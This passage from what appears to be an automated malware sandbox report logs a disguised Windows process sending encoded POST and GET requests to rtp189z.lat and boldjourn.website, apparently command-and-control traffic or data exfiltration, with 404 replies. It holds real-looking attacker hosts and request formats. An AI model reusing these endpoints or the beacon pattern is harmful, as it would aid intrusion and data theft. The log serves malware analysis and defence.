64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
Jan 16, 2025 09:25:05.904033899 CET	316	IN	Data Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	50025	68.65.122.71	80	5600	C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 09:25:07.573101997 CET	758	OUT	POST /tt36/ HTTP/1.1 Host: www.rtp189z.lat Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Content-Length: 222 Cache-Control: no-cache Connection: close Origin: http://www.rtp189z.lat Referer: http://www.rtp189z.lat/tt36/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1 Data Raw: 42 58 63 38 56 3d 32 56 35 74 37 74 6b 77 74 77 68 65 37 33 68 51 53 69 68 6e 42 64 4e 52 50 57 31 65 71 2b 53 43 49 6b 51 6b 52 63 4f 73 5a 62 2f 70 52 70 2b 54 6f 69 59 39 36 2b 68 39 49 43 79 65 2f 54 4f 6c 42 6b 57 4a 4d 31 33 32 35 31 47 54 71 38 77 64 46 4d 69 53 76 58 56 51 32 72 36 52 32 54 66 30 52 65 35 79 7a 4f 66 70 58 47 74 57 6c 45 55 6c 46 45 31 4c 36 49 77 38 42 35 30 4e 53 2f 4a 6a 6d 6f 65 2b 55 78 48 73 4a 4e 49 6f 66 6b 67 67 4b 58 65 45 53 5a 52 6d 66 43 53 30 47 6f 49 4c 45 67 4c 45 73 48 73 2b 59 64 37 49 42 73 4b 39 41 78 44 4e 74 55 4b 53 33 4c 4d 64 6a 4c 51 75 34 66 44 6e 41 44 77 6e 46 39 70 67 45 51 52 6d 52 47 42 55 75 75 67 3d Data Ascii: BXc8V=2V5t7tkwtwhe73hQSihnBdNRPW1eq+SCIkQkRcOsZb/pRp+ToiY96+h9ICye/TOlBkWJM13251GTq8wdFMiSvXVQ2r6R2Tf0Re5yzOfpXGtWlEUlFE1L6Iw8B50NS/Jjmoe+UxHsJNIofkggKXeESZRmfCS0GoILEgLEsHs+Yd7IBsK9AxDNtUKS3LMdjLQu4fDnADwnF9pgEQRmRGBUuug=
Jan 16, 2025 09:25:08.795496941 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 16 Jan 2025 08:25:08 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
Jan 16, 2025 09:25:08.795545101 CET	316	IN	Data Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	50026	68.65.122.71	80	5600	C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 09:25:10.122344971 CET	10840	OUT	POST /tt36/ HTTP/1.1 Host: www.rtp189z.lat Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Content-Length: 10302 Cache-Control: no-cache Connection: close Origin: http://www.rtp189z.lat Referer: http://www.rtp189z.lat/tt36/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1 Data Raw: 42 58 63 38 56 3d 32 56 35 74 37 74 6b 77 74 77 68 65 37 33 68 51 53 69 68 6e 42 64 4e 52 50 57 31 65 71 2b 53 43 49 6b 51 6b 52 63 4f 73 5a 62 48 70 52 66 71 54 71 42 77 39 31 65 68 39 4c 43 79 62 2f 54 50 35 42 6b 75 4e 4d 31 7a 4d 35 33 4f 54 71 65 6f 64 43 39 69 53 31 48 56 51 37 4c 36 55 6f 6a 65 32 52 65 70 32 7a 4f 50 70 58 47 74 57 6c 48 4d 6c 43 56 31 4c 34 49 77 2f 47 35 31 4d 66 66 49 4d 6d 6f 48 46 55 77 7a 38 4a 63 6f 6f 61 30 77 67 46 46 6d 45 50 70 52 6b 63 43 53 73 47 6f 45 51 45 68 6e 69 73 45 78 6a 59 63 44 49 52 4b 4c 46 53 42 43 4f 73 46 53 55 74 70 67 45 37 5a 55 71 34 63 2f 4e 4c 44 67 74 48 65 5a 35 41 79 30 4f 4a 54 46 75 78 72 4d 55 76 66 76 68 37 4e 67 6a 4e 4d 71 62 63 5a 6f 72 2b 73 39 68 61 50 6b 78 52 43 61 38 49 36 51 75 4a 50 73 79 4d 37 79 44 33 37 6e 6b 41 2f 6a 78 48 59 57 41 78 70 36 56 49 6b 54 41 35 6d 4c 6d 70 59 4a 33 74 6d 56 76 71 52 4b 56 75 6d 77 53 4c 6d 79 4c 74 33 50 48 31 34 31 49 47 43 7a 76 6a 50 68 37 6c 57 45 4b 32 47 42 4d 61 50 44 61 63 37 75 59 [TRUNCATED] Data Ascii: BXc8V=2V5t7tkwtwhe73hQSihnBdNRPW1eq+SCIkQkRcOsZbHpRfqTqBw91eh9LCyb/TP5BkuNM1zM53OTqeodC9iS1HVQ7L6Uoje2Rep2zOPpXGtWlHMlCV1L4Iw/G51MffIMmoHFUwz8Jcooa0wgFFmEPpRkcCSsGoEQEhnisExjYcDIRKLFSBCOsFSUtpgE7ZUq4c/NLDgtHeZ5Ay0OJTFuxrMUvfvh7NgjNMqbcZor+s9haPkxRCa8I6QuJPsyM7yD37nkA/jxHYWAxp6VIkTA5mLmpYJ3tmVvqRKVumwSLmyLt3PH141IGCzvjPh7lWEK2GBMaPDac7uYmzoG3WnvqihjVUH3AAAMk6QFOqDPYrryKBeA5A+y4mXB9PhifzFWkYbihMT/GzlMc8WD6UdF9REPpW2YFYO648cogcw9UuiAgDQGIrj7f513t780RMkHDNA6/rKID/6fEu44+eBESGfo/rwZzl0My3XYdA+3RYICYdgc0Lkpgd12fTOipZX2VueC16oT5GcEG8jl8CsZC0hFvhZkgSEwKlFiDZkvREfynmBBA57evkN/VNxQfZ0nSiUYcAw9RRPoeB70YUPmVO5XutGlL2BXngzRt7mC60JzftrftC1rxyTplYZ9+a8Sb7FSVbfKURQVrbl02B51TDo6FWA76nZphCgO2sHbZWNKIX6j0z0tpJCBY47uRZv4oQUqPStgz1BBBoOyd3QsH4oMWelrOC9/lENA8wwS3VfpHjyIOi/MBk9sv7JLiF0li7tzusx0DMVR/JSpn7BjFThKPIRJwieI5BM6ro3hOILl5ZNOZiUdqPH07UqGQh7ZX2/NuFSdObNLQWy84kCDSMxctLFd/Z5Npmb4xIMI7/bU0mqPvMkdfGnq00YLjn90A3wy8Mw90lXL3YyFj/gC3SFtNLHmE5NcxCDzStCVXnZX28KhySAci6p7txACUfa3wsIC/fMKVpJZvQU9tRNTAxrWQFs4lGknxTC+OuVYpCTeUA [TRUNCATED]
Jan 16, 2025 09:25:10.891068935 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 16 Jan 2025 08:25:10 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
Jan 16, 2025 09:25:10.891093016 CET	316	IN	Data Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	50027	68.65.122.71	80	5600	C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 09:25:12.664658070 CET	480	OUT	GET /tt36/?BXc8V=7XRN4ZBNuxsgsz85WwF8d5RVD19EzJb4JnIab8u1JoWwH5zq0g0l+ZcBEWO33waNPxeiCBvzmGaSpdMTI8OJtChGzZiriz+EVcp1nviLXn5OzCwSP0UMhIk=&f898=D4YHodiH3rXTfZ HTTP/1.1 Host: www.rtp189z.lat Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1
Jan 16, 2025 09:25:13.527156115 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 16 Jan 2025 08:25:13 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
Jan 16, 2025 09:25:13.527180910 CET	316	IN	Data Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	50028	209.74.64.189	80	5600	C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 09:25:18.586195946 CET	756	OUT	POST /6qnn/ HTTP/1.1 Host: www.boldjourn.website Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Content-Length: 202 Cache-Control: no-cache Connection: close Origin: http://www.boldjourn.website Referer: http://www.boldjourn.website/6qnn/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1 Data Raw: 42 58 63 38 56 3d 75 62 4c 69 75 6d 51 75 70 4c 45 46 64 69 77 74 61 70 7a 6c 31 73 72 52 36 68 58 51 6f 70 62 77 64 4b 49 52 46 66 57 78 4d 62 78 45 4a 49 76 68 6a 58 70 2b 4e 38 4f 49 75 4d 69 2b 66 54 32 64 7a 47 6f 2f 43 72 69 6d 32 4e 57 5a 73 37 71 52 53 78 4d 37 33 7a 47 5a 50 35 6b 47 42 48 66 4c 44 65 50 70 4f 53 72 67 43 55 79 4f 75 36 66 69 30 35 72 4c 6a 69 53 30 6f 39 65 77 67 31 75 54 47 73 53 49 5a 76 62 4d 4e 46 52 59 53 69 34 33 2b 36 72 75 56 48 49 55 35 62 64 72 78 49 33 75 46 66 74 6b 4c 4c 7a 6b 6d 6f 44 4a 57 6b 5a 30 48 44 74 62 5a 77 56 2b 74 34 2b 50 48 76 6c 46 6e 77 3d 3d Data Ascii: BXc8V=ubLiumQupLEFdiwtapzl1srR6hXQopbwdKIRFfWxMbxEJIvhjXp+N8OIuMi+fT2dzGo/Crim2NWZs7qRSxM73zGZP5kGBHfLDePpOSrgCUyOu6fi05rLjiS0o9ewg1uTGsSIZvbMNFRYSi43+6ruVHIU5bdrxI3uFftkLLzkmoDJWkZ0HDtbZwV+t4+PHvlFnw==
Jan 16, 2025 09:25:19.152981043 CET	533	IN	HTTP/1.1 404 Not Found Date: Thu, 16 Jan 2025 08:25:19 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	50029	209.74.64.189	80	5600	C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 09:25:21.150480032 CET	776	OUT	POST /6qnn/ HTTP/1.1 Host: www.boldjourn.website Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Content-Length: 222 Cache-Control: no-cache Connection: close Origin: http://www.boldjourn.website Referer: http://www.boldjourn.website/6qnn/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1 Data Raw: 42 58 63 38 56 3d 75 62 4c 69 75 6d 51 75 70 4c 45 46 50 52 6f 74 66 4f 76 6c 39 73 72 53 2f 68 58 51 6d 4a 62 30 64 4c 30 52 46 62 50 73 4d 49 56 45 48 49 66 68 74 31 4e 2b 4d 38 4f 49 36 38 69 2f 62 54 32 67 7a 48 56 4d 43 76 69 6d 32 4e 71 5a 73 35 69 52 52 47 34 34 31 6a 47 58 41 5a 6b 49 4d 6e 66 4c 44 65 50 70 4f 57 37 61 43 55 71 4f 75 72 76 69 31 59 72 4d 39 53 53 33 72 39 65 77 71 56 75 58 47 73 54 66 5a 74 75 6a 4e 48 5a 59 53 6d 6f 33 35 72 72 74 62 48 49 61 39 62 64 37 69 59 32 58 4d 4f 6b 5a 4c 64 7a 69 70 63 54 6d 54 69 55 75 57 79 4d 4d 4c 77 78 4e 77 2f 33 37 4b 73 59 4d 38 33 39 4d 4c 67 4f 44 57 61 4c 2f 7a 33 74 37 4f 39 32 44 66 69 38 3d Data Ascii: BXc8V=ubLiumQupLEFPRotfOvl9srS/hXQmJb0dL0RFbPsMIVEHIfht1N+M8OI68i/bT2gzHVMCvim2NqZs5iRRG441jGXAZkIMnfLDePpOW7aCUqOurvi1YrM9SS3r9ewqVuXGsTfZtujNHZYSmo35rrtbHIa9bd7iY2XMOkZLdzipcTmTiUuWyMMLwxNw/37KsYM839MLgODWaL/z3t7O92Dfi8=
Jan 16, 2025 09:25:21.705100060 CET	533	IN	HTTP/1.1 404 Not Found Date: Thu, 16 Jan 2025 08:25:21 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	50030	209.74.64.189	80	5600	C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe

Timestamp	Bytes transferred	Direction	Data
